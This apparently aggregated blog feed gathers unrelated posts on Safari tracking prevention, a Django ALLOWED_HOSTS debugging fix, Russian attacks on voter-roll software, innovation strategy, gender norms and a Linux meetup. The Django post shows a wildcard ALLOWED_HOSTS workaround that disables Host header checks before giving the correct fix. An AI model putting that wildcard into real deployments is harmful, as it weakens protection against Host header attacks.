Students in Year 3 (Unit 3.6), 4 (Unit 4.2), 5 (Unit 5.2) and 6 (Unit 6.2) are finishing off their presentations and any outstanding work this week. Sometimes the middle of term can be very rushed and so it’s always good to have some breathing space at the end to catch up on anything that might have been squeezed out before. For those classes where everyone is up-to-date and looking for extra activities, the Aunt Madge’s Suitcase Activity is always popular with students and can be used to support their learning. Teachers may wish to select a range of destinations appropriate to the work covered during the term and encourage students to think about how those destinations relate to the material covered in class. Destinations may be selected by continent or theme – e.g. natural places or historical sites. A further advantage of Aunt Madge is that the activity can be tailored to fit the available time – from 5 or 10 minutes for a single destination, to 45 minutes or more for a full selection; and played in groups, or as a whole class, allowing some students to undertake the activity while other students may be catching up on other work. Students may also wish to revisit aspects of the Ancient Sailing Ships Activity and expand on their investigations.

Although this is the last week of this term’s units, we will have some more suggestions for extra activities next week – particularly those that keep the students busy while teachers attend to marking or compiling of reports.

Don MartiApple's kangaroo cookie robot

I'm looking forward to trying "Intelligent Tracking Prevention" in Apple Safari. But first, let's watch an old TV commercial for MSN.

Today, a spam filter seems like a must-have feature for any email service. But MSN started talking about its spam filtering back when Sanford Wallace, the "Spam King," was saying stuff like this.

I have to admit that some people hate me, but I have to tell you something about hate. If sending an electronic advertisement through email warrants hate, then my answer to those people is "Get a life. Don't hate somebody for sending an advertisement through email." There are people out there that also like us.

According to spammers, spam filtering was just Internet nerds complaining about something that regular users actually like. But the spam debate ended when big online services, starting with MSN, started talking about how they build for their real users instead of for Wallace's hypothetical spam-loving users.

If you missed the email spam debate, don't worry. Wallace's talking points about spam filters constantly get recycled by surveillance marketers talking about tracking protection. But now it's not email spam that users supposedly crave. Today, the Interactive Advertising Bureau tells us that users want ads that "follow them around" from site to site.

Enough background. Just as the email spam debate ended with MSN's campaign, the third-party web tracking debate ended on June 5, 2017.

With Intelligent Tracking Prevention, WebKit strikes a balance between user privacy and websites’ need for on-device storage. That said, we are aware that this feature may create challenges for legitimate website storage, i.e. storage not intended for cross-site tracking.

If you need it in bullet points, here it is.

  • Nifty machine learning technology is coming in on the user's side.

  • "Legitimate" uses do not include cross-site tracking.

  • Safari's protection is automatic and client-side, so no blocklist politics.

Surveillance marketers come up with all kinds of hypothetical reasons why users might prefer targeted ads. But in the real world, Apple invests time and effort to understand user experience. When Apple communicates about a feature, it's because that feature is likely to keep a user satisfied enough to buy more Apple devices. We can't read their confidential user research, but we can see what the company learned from it based on how they communicate about products.

(Imagine for a minute that Apple's user research had found that real live users are more like the Interactive Advertising Bureau's idea of a user. We might see announcements more like "Safari automatically shares your health and financial information with brands you love!" Anybody got one of those to share?)

Saving an out-of-touch ad industry

Advertising supports journalism and cultural works that would not otherwise exist. It's too important not to save. Bob Hoffman asks,

[H]ow can we encourage an acceptable version of online advertising that will allow us to enjoy the things we like about the web without the insufferable annoyance of the current online ad model?

The browser has to be part of the answer. If the browser does its job, as Safari is doing, it can play a vital role in re-connecting users with legit advertising—just as users have come to trust legit email newsletters now that they have effective spam filters.

Safari's Intelligent Tracking Prevention is not the final answer any more than Paul Graham's "A plan for spam" was the final spam filter. Adtech will evade protection tools just as spammers did, and protection will have to keep getting better. But at least now we can finally say debate over, game on.

With New Browser Tech, Apple Preserves Privacy and Google Preserves Trackers

An Ad Network That Works With Fake News Sites Just Launched An Anti–Fake News Initiative

Google Slammed For Blocking Ads While Allowing User Tracking

Introducing FilterBubbler: A WebExtension built using React/Redux

Forget far-right populism – crypto-anarchists are the new masters

Risks to brands under new EU regulations

Breitbart ads plummet nearly 90 percent in three months as Trump’s troubles mount

Be Careful Celebrating Google’s New Ad Blocker. Here’s What’s Really Going On.

‘We know the industry is a mess’: Marketers share challenges at Digiday Programmatic Marketing Summit

FIREBALL – The Chinese Malware of 250 Million Computers Infected

Verified bot laundering 2. Not funny. Just die

Publisher reliance on tech providers is ‘insane’: A Digiday+ town hall with The Washington Post’s Jarrod Dicker

Why pseudonymization is not the silver bullet for GDPR.

A level playing field for companies and consumers

Planet Linux AustraliaFrancois Marier: Mysterious 400 Bad Request in Django debug mode

While upgrading Libravatar to a more recent version of Django, I ran into a mysterious 400 error.

In debug mode, my site was working fine, but with DEBUG = False, I would only get a page containing this error:

Bad Request (400)

with no extra details in the web server logs.

Turning on extra error logging

To see the full error message, I configured logging to a file by adding this to settings.py:

LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'handlers': {
        'file': {
            'level': 'DEBUG',
            'class': 'logging.FileHandler',
            'filename': '/tmp/debug.log',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['file'],
            'level': 'DEBUG',
            'propagate': True,
        },
    },
}

Then I got the following error message:

Invalid HTTP_HOST header: 'www.example.com'. You may need to add u'www.example.com' to ALLOWED_HOSTS.

Temporary hack

Sure enough, putting this in settings.py would make it work outside of debug mode:

ALLOWED_HOSTS = ['*']

which means that there's a mismatch between the HTTP_HOST from Apache and the one that Django expects.

Root cause

The underlying problem was that the Libravatar config file was missing the square brackets around the ALLOWED_HOSTS setting.

I had this:

ALLOWED_HOSTS = 'www.example.com'

instead of:

ALLOWED_HOSTS = ['www.example.com']
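The symptom makes sense once you notice that Django iterates over ALLOWED_HOSTS when validating the Host header, so a bare string is treated as a sequence of one-character patterns. Here is a simplified sketch of that matching logic (my own illustration, not Django's actual validate_host implementation, which also handles wildcard subdomains):

```python
def is_allowed(host, allowed_hosts):
    # simplified host check: accept if any pattern is '*' or equals the host
    return any(pattern == '*' or pattern == host for pattern in allowed_hosts)

# with the proper list, the full hostname is one pattern and matches
print(is_allowed('www.example.com', ['www.example.com']))  # True

# with the bare string, iteration yields 'w', 'w', 'w', '.', ...
# so no single-character pattern can ever equal the full hostname
print(is_allowed('www.example.com', 'www.example.com'))    # False
```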

,

CryptogramFriday Squid Blogging: Sex Is Traumatic for the Female Dumpling Squid

The more they mate, the sooner they die. Academic paper (paywall). News article.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramNSA Document Outlining Russian Attempts to Hack Voter Rolls

This week brought new public evidence about Russian interference in the 2016 election. On Monday, the Intercept published a top-secret National Security Agency document describing Russian hacking attempts against the US election system. While the attacks seem more exploratory than operational ­-- and there's no evidence that they had any actual effect ­-- they further illustrate the real threats and vulnerabilities facing our elections, and they point to solutions.

The document describes how the GRU, Russia's military intelligence agency, attacked a company called VR Systems that, according to its website, provides software to manage voter rolls in eight states. The August 2016 attack was successful, and the attackers used the information they stole from the company's network to launch targeted attacks against 122 local election officials on October 27, 12 days before the election.

That is where the NSA's analysis ends. We don't know whether those 122 targeted attacks were successful, or what their effects were if so. We don't know whether other election software companies besides VR Systems were targeted, or what the GRU's overall plan was -- if it had one. Certainly, there are ways to disrupt voting by interfering with the voter registration process or voter rolls. But there was no indication on Election Day that people found their names removed from the system, or their address changed, or anything else that would have had an effect -- anywhere in the country, let alone in the eight states where VR Systems is deployed. (There were Election Day problems with the voting rolls in Durham, NC ­-- one of the states that VR Systems supports ­-- but they seem like conventional errors and not malicious action.)

And 12 days before the election (with early voting already well underway in many jurisdictions) seems far too late to start an operation like that. That is why these attacks feel exploratory to me, rather than part of an operational attack. The Russians were seeing how far they could get, and keeping those accesses in their pocket for potential future use.

Presumably, this document was intended for the Justice Department, including the FBI, which would be the proper agency to continue looking into these hacks. We don't know what happened next, if anything. VR Systems isn't commenting, and the names of the local election officials targeted did not appear in the NSA document.

So while this document isn't much of a smoking gun, it's yet more evidence of widespread Russian attempts to interfere last year.

The document was, allegedly, sent to the Intercept anonymously. An NSA contractor, Reality Leigh Winner, was arrested Saturday and charged with mishandling classified information. The speed with which the government identified her serves as a caution to anyone wanting to leak official US secrets.

The Intercept sent a scan of the document to another source during its reporting. That scan showed a crease in the original document, which implied that someone had printed the document and then carried it out of some secure location. The second source, according to the FBI's affidavit against Winner, passed it on to the NSA. From there, NSA investigators were able to look at their records and determine that only six people had printed out the document. (The government may also have been able to track the printout through secret dots that identified the printer.) Winner was the only one of those six who had been in e-mail contact with the Intercept. It is unclear whether the e-mail evidence was from Winner's NSA account or her personal account, but in either case, it's incredibly sloppy tradecraft.

With President Trump's election, the issue of Russian interference in last year's campaign has become highly politicized. Reports like the one from the Office of the Director of National Intelligence in January have been criticized by partisan supporters of the White House. It's interesting that this document was reported by the Intercept, which has been historically skeptical about claims of Russian interference. (I was quoted in their story, and they showed me a copy of the NSA document before it was published.) The leaker was even praised by WikiLeaks founder Julian Assange, who up until now has been traditionally critical of allegations of Russian election interference.

This demonstrates the power of source documents. It's easy to discount a Justice Department official or a summary report. A detailed NSA document is much more convincing. Right now, there's a federal suit to force the ODNI to release the entire January report, not just the unclassified summary. These efforts are vital.

This hack will certainly come up at the Senate hearing where former FBI director James B. Comey is scheduled to testify Thursday. Last year, there were several stories about voter databases being targeted by Russia. Last August, the FBI confirmed that the Russians successfully hacked voter databases in Illinois and Arizona. And a month later, an unnamed Department of Homeland Security official said that the Russians targeted voter databases in 20 states. Again, we don't know of anything that came of these hacks, but expect Comey to be asked about them. Unfortunately, any details he does know are almost certainly classified, and won't be revealed in open testimony.

But more important than any of this, we need to better secure our election systems going forward. We have significant vulnerabilities in our voting machines, our voter rolls and registration process, and the vote tabulation systems after the polls close. In January, DHS designated our voting systems as critical national infrastructure, but so far that has been entirely for show. In the United States, we don't have a single integrated election. We have 50-plus individual elections, each with its own rules and its own regulatory authorities. Federal standards that mandate voter-verified paper ballots and post-election auditing would go a long way to secure our voting system. These attacks demonstrate that we need to secure the voter rolls, as well.

Democratic elections serve two purposes. The first is to elect the winner. But the second is to convince the loser. After the votes are all counted, everyone needs to trust that the election was fair and the results accurate. Attacks against our election system, even if they are ultimately ineffective, undermine that trust and ­-- by extension ­-- our democracy. Yes, fixing this will be expensive. Yes, it will require federal action in what's historically been state-run systems. But as a country, we have no other option.

This essay previously appeared in the Washington Post.

TEDTwo surprising strategies for effective innovation

Picture this: Three kids are given a LEGO set with the pieces to build a fire department. All of them want to build as many new toys as possible.

The first kid goes straight for the easy wins. He puts a tiny red hat on a tiny minifig: presto, a firefighter! In this way, he quickly makes several simple toys. The second kid goes by intuition. He chooses the pieces he’s drawn to and imagines how he could combine them. The third takes a different strategy altogether: She picks up axles, wheels, base plates; pieces she can’t use now but knows she’ll need later if she wants to build complex toys.

By the time they’re finished playing, which kid will have created the most new toys?

Common lore favors the second kid’s strategy — innovation by intuition or visionary foresight. “Innovation has been more of an art than a science,” says Martin Reeves (TED Talk: How to build a business that lasts 100 years), a senior partner and managing director at BCG, and global director of BCG’s think tank. “We think it’s dependent on intuition or personality or luck.”

A new study, led by Reeves and Thomas Fink from the London Institute of Mathematical Sciences, shows that’s not the case.

“Innovation is an unpredictable process, but one with predictable features,” says Reeves. “It’s not just a matter of luck. It’s possible to have a strategy of innovation.”

The study found that the second kid, guided only by intuition and vision, is the least likely to succeed. The other two are the ones to emulate, but the secret is knowing how and when to use each of their tactics.   

The Impatient Strategy

Let’s go back to the first kid, the one who started by putting hats on the figurines. His strategy is familiar to entrepreneurs: he’s creating the minimum viable product, or the simplest, fastest version of a finished product.

Reeves calls that an “impatient strategy.” It’s fast, iterative, and bare bones.  

When you’re breaking into a market that’s fairly new, an impatient strategy is the best way to go. “Look for simple solutions,” says Reeves.    

For example, that’s what Uber did when it first launched. The industry was young and easy to disrupt, so the app combined technologies that already existed to create a simple black-car service. Only later did it become the sprawling company it is today, looking ahead to things like the future of self-driving cars.   

The Patient Strategy

An impatient strategy might be effective early on, but eventually, it stops working.

Enter the third kid from our LEGO story. She’s not worried about speed; she’s focused on the end point she wants to reach. It’ll take her longer to build a toy, but she’s more likely to create a toy that’s elaborate (think: a fire truck) and more sophisticated than the first kid’s firefighters in hats. 

Reeves calls this a “patient strategy.” It’s complex, forward-looking, and relatively slow.   

A patient strategy is too costly for most startups. It requires resources and access, and it risks investing a lot in a product that doesn’t take off. “It becomes a big company game,” says Reeves.  

For example, Apple is known to make investments in technologies that often pay off later, many years after acquisition or initial patenting. That’s the hallmark of a patient strategy.    

When to Switch Your Strategy  

The most successful entrepreneurs use both strategies. They’re fast and agile when their industry is young; patient and forward-looking as their industry gets more advanced.  

How do you know when to switch? “Think of this as a search,” says Reeves. “Understand the maturity of your space by looking at the complexity of the products that you and your competitors are creating.”  

As the products get more complex, your strategy should get more patient.

Of course, the rest of the business needs to follow suit. “Adjust all aspects of your business to match your strategy,” says Reeves. “An impatient strategy is fast and agile, but you also need to prepare yourself to change your approach and structure later.”
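The impatient-versus-patient tradeoff can be sketched as a toy simulation. Everything below is illustrative only — the products, the acquisition budget, and the scoring are invented for this sketch, not taken from the Reeves and Fink study:

```python
# Toy model: innovation as combining components into products.
# Simple products need one piece; complex products need several.
PRODUCTS = [
    frozenset({1}), frozenset({2}),           # simple toys: one piece each
    frozenset({3, 4}), frozenset({3, 4, 5}),  # complex toys: several pieces
]

def run(strategy, budget):
    """Acquire one component per turn; build every product you can afford."""
    owned, built = set(), set()
    for _ in range(budget):
        owned.add(strategy(owned))
        built.update(p for p in PRODUCTS if p <= owned)
    return built

def impatient(owned):
    """Grab a piece that finishes the simplest unfinished product."""
    for p in sorted(PRODUCTS, key=len):
        missing = p - owned
        if missing:
            return min(missing)
    return 0

def patient(owned):
    """Grab a piece needed for the most complex unfinished product."""
    for p in sorted(PRODUCTS, key=len, reverse=True):
        missing = p - owned
        if missing:
            return min(missing)
    return 0
```

With a small budget (two turns) the impatient strategy builds two simple toys while the patient one builds only one; a turn later, the patient strategy's toys are more elaborate, scoring higher if products are valued by how many pieces they combine. That is the article's point in miniature: speed pays early, accumulation pays as complexity grows.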


Sociological ImagesMocking perfect gender performances (because the rule is to break rules)

Both men and women face a lot of pressure to perform masculinity and femininity respectively. But, ironically, people who rigidly conform to rules about gender, those who enact perfect performances of masculinity or femininity, are often the butt of jokes. Many of us, for example, think the male body builder is kind of gross; we suspect that he may be compensating for something, that he's dumb as a rock, or even that he's narcissistic. Likewise, when we see a bleach blond teetering in stilettos and pulling up her strapless mini, many of us think she must be stupid and shallow, with nothing between her ears but fashion tips.

The fact that we live in a world where there are different expectations for men’s and women’s behavior, in other words, doesn’t mean that we’re just robots acting out those expectations. We actually tend to mock slavish adherence to those rules, even as we carefully negotiate them (breaking some rules, but not too many, and not the really important ones).

In any case, I thought of this when I saw this ad. The woman at the other end of the table is doing (at least some version of) femininity flawlessly. Her hair is perfect, her lips are exactly the right shade of pink, her shoulders are bare. But… it isn’t enough. The man behind the menu has “lost interest.”

It’s unfortunate that we spend so much time telling women that the most important thing about them is that they conform to expectations of feminine beauty when, in reality, living up to those expectations means performing an identity that we disdain.

We do it to men, too.  We expect guys to be strictly masculine, and when they turn out to be jocks and frat boys, we wonder why they can’t be nicer or more well-rounded.

Lisa Wade, PhD is a professor at Occidental College. She is the author of American Hookup, a book about college sexual culture, and a textbook about gender. You can follow her on Twitter, Facebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Worse Than FailureError'd: Know Your Bits!

"I know software can't always be perfect, but things like this make me want to shut down my PC and say that's enough computering for the day," writes Timothy W.

 

Richard S. wrote, "I suppose you don't really need an email body when you have everything you need in the subject."

 

"I recently inherited a project from a contractor that left the project," writes Michael H., "I have never seen code quite like his, and that is NOT a compliment."

 

Bruce C. writes, "The fact that this won't ship to NZ is kind of immaterial - the REAL question is do I feel like spending $10.95 for new or can I settle for used at a discount?"

 

"I'm sure their product is great, but I don't want to be an early adopter if I can help it," writes Jaime A.

 

"To be fair, the email did catch my attention," wrote Philip G.

 

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet Linux AustraliaLinux Users of Victoria (LUV) Announce: LUV Beginners June Meeting: Debian 9 release party!

Jun 17 2017 12:30
Jun 17 2017 16:30
Location: 
Infoxchange, 33 Elizabeth St. Richmond

Debian Linux version 9 (codename "Stretch") is scheduled for release on 17 June 2017.  Join us in celebrating the release and assisting anyone who would like to install or upgrade to the new version!


There will also be the usual casual hands-on workshop, Linux installation, configuration and assistance and advice. Bring your laptop if you need help with a particular issue. This will now occur BEFORE the talks from 12:30 to 14:00. The talks will commence at 14:00 (2pm) so there is time for people to have lunch nearby.

The meeting will be held at Infoxchange, 33 Elizabeth St. Richmond 3121 (enter via the garage on Jonas St.) Late arrivals, please call (0421) 775 358 for access to the venue.

LUV would like to acknowledge Infoxchange for the venue.

Linux Users of Victoria Inc., is an incorporated association, registration number A0040056C.

,

CryptogramSafety and Security and the Internet of Things

Ross Anderson blogged about his new paper on security and safety concerns about the Internet of Things. (See also this short video.)

It's very much along the lines of what I've been writing.